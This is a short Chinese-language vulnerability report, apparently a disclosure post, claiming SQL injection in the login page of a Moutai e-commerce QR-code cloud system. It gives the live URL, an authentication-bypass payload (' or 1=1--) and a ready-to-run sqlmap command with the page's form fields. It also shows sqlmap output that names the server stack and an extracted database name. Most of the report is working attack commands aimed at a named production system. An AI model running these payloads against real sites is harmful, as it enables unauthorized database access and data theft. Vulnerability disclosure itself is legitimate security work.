茅台电商某云系统存在SQL注入漏洞

茅台物联网云商二维码系统

https://qr.emaotai.cn:8002/Login.aspx



使用用户名: ' or 1=1-- ,密码任意登录,提示用户名重复存在,说明存在SQL注入漏洞
 

maotai1.png

注入证明
 

python sqlmap.py -u "https://qr.emaotai.cn:8002/Login.aspx" --data "LPwd=test&__VIEWSTATE=/wEPDwUJLTM1ODc3NjIzZGT5GWrJ8OtTFa1lO/72dVlGhlYLIwkVyP2cTT7IsDlhoA==&LName=test&__VIEWSTATEGENERATOR=C2EE9ABB&__EVENTVALIDATION=/wEdAAIPKupgvSAAjsC8eUlqiAjGDHpVR6YSzK6KxKmAndxcpFOEzcJUk+42FbwcrMXN1VmNYWI5ZZ+9Lwc4zeaoyELx&ScreenWidth=CasterPy&SubmitID=test" -p LName --dbs --time-sec 3


 

[11:25:05] [INFO] the back-end DBMS is Microsoft SQL Server web server operating system: Windows 2008 R2 or 7 web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5 back-end DBMS: Microsoft SQL Server 2005 [11:25:05] [INFO] fetching database names [11:25:05] [INFO] fetching number of databases



数据库名:em_qr_cloud